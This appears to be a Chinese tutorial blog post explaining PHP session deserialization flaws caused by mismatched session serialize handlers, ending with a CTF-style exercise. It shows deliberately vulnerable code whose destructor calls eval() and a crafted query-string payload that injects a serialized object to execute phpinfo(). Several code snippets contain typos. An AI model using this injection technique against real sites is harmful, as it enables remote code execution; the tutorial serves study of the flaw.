session反序列化

补天阁2024-01-27 9:51

据陈腾师傅所说:

1.漏洞产生原因:写入格式和读取格式不一样。

下面是三种常见的存储格式:

|---------------------------|---------------------------------------------|
| 处理器 | 对应的存储格式 |
| php | 键名+竖线+经过serialize()函数序列化处理的值 |
| php_serialize(php>=5.54) | 经过serlalize()函数序列化处理的数组 |
| php_binary | 键名的长度对应的ASCII字符+键名+经过 serialize()函数反序列化处理的值 |

复制代码 
(1)php存储
<?php
session_start();
$_SRSSION['benben']=$_GET['ben'];
?>
提交:?ben=dazhuang

结果:benben|s:8:"daxhuang";

键名+竖线+经过serialize()函数序列化处理的值

**(2)**php_serialize(php>=5.54)存储

<?php

highlight_file(FILE);

error_reporting(0);

ini_set('session.serialize_handler','php_serialize');

session_start();

_SESSION\['benben'\] = _GET['ben'];

_SESSION\['b'\] = _GET['b'];

?>

提交:?ben=dazhuang&b=666

结果:a:2:{s:6:"benben";s:8:"dazhuang";s:1:"b";s:3:"666";}

经过serlalize()函数序列化处理的数组

(3)php_binary存储

<?php

highlight_file(FILE);

error_reporting(0);

ini_set('session.serialize_handler','php_binary');

session_start();

_SESSION\['benben'\] = _GET['ben'];

_SESSION\['b'\] = _GET['b'];

?>

提交:?ben=dazhuang&b=666

结果:ACKbenbens:8:"dazhuang";SOHbs:3:"666";

键名的长度对应的ASCII字符+键名+经过serialize()函数反序列化处理的值

来到题目实战练习:

<?php

highlight_file(FILE);

error_reporting(0);

ini_set('session.serialize_handler','php');

session_start();

class D{

var $a;

function __destruct(){

eval($this->a);

}

}

?>

<?php

highlight_file(FILE);

error_reporting(0);

ini_set('session.serialize_handler','php_serialize');

session_start();

_SESSION\['ben'\] = _GET['a'];

?>

这里有两个网页分别对应的两段代码,我们只能在页面2上提交,还是老样子,反序列化的很多漏洞开头都是一样的,都要先进行一次正常的反序列化

复制代码 
<?php
class D{
    var $a= "phpinfo();";
}
echo serialize(new D());

O:1:"D":1:{s:1:"a";s:10:"phpinfo();";}

到这里,我们得先明白我们要做什么,我们传参a是以php_serialize格式写进去的,但是读取是php读取的,

当我们提交:?a=|O:1:"D":1:{s:1:"a";s:10:"phpinfo();";}

经过php_serialize保存后,变成了:a:1:{s:3:"ben";s:39:"|O:1:"D":1:{s:1:"a";s:10:"phpinfo();";}//全都是经过serlalize()函数序列化处理的数组

**经过PHP读取后,**a:1:{s:3:"ben";s:39:"|O:1:"D":1:{s:1:"a";s:10:"phpinfo();";}变成了键名+竖线+经过serialize()函数序列化处理的值,

正好我要的经过serialize()函数序列化处理的值就是O:1:"D":1:{s:1:"a";s:10:"phpinfo();";}这堆可以执行phpinfo的代码,所以漏洞利用成功的。

提交:?a=|O:1:"D":1:{s:1:"a";s:10:"phpinfo();";}

希望大家能够从文章中收获知识!谢谢!

相关推荐
zx2859634002 小时前
Laravel 7.x新特性全解析
php·laravel
zx2859634003 小时前
Laravel 4.x:颠覆PHP框架的10大革新特性
开发语言·php·laravel
xxjj998a4 小时前
PHP vs C#:核心差异全解析
开发语言·c#·php
吉吉615 小时前
php反序列化基础知识前奏
android·php·反序列化
星光开发者6 小时前
基于springboot电动汽车租赁管理系统-计算机毕设 附源码 11217
javascript·spring boot·mysql·django·php·html5·express
Aision_6 小时前
为什么 CTI 场景需要知识图谱?
人工智能·python·安全·web安全·langchain·prompt·知识图谱
xxjj998a6 小时前
PHP vs C++:性能与用途全解析
php·laravel
HackTwoHub19 小时前
全新 AI 赋能网安平台 基于 Mitmproxy 流量分析自动化资产挖、轻量化综合渗透工具箱
人工智能·web安全·网络安全·系统安全·安全架构·sql注入
HackTwoHub21 小时前
Linux 内核史诗级本地提权 全网深度复现、原理完整分析( CVE-2026-31431)
linux·运维·安全·web安全·网络安全·代码审计·安全架构
X7x51 天前
筑牢网络安全防线:Web应用防火墙(WAF)全面解析
web安全·网络安全·安全架构·waf
热门推荐
01要裂开了!ChatGPT要手机号验证了?注册Codex要求验证电话号码怎么办?2026年登陆Codex要手机号验证的解决办法02GitHub 镜像站点03Codex 接入 DeepSeek API 完整配置文档04零基础教你claude code 接入 deepseek V405【AI】2026 年具身智能模型和世界模型总结062026年AI前瞻:量子AI、具身智能与科学发现的新纪元07裂开!ChatGPT 居然开始要手机号验证,附详细解决方法08几个好用的ip纯净度检测网站09CC-Switch & Claude 基于 Linux 服务器安装使用指南10VSCode + Copilot下:配置并使用 DeepSeek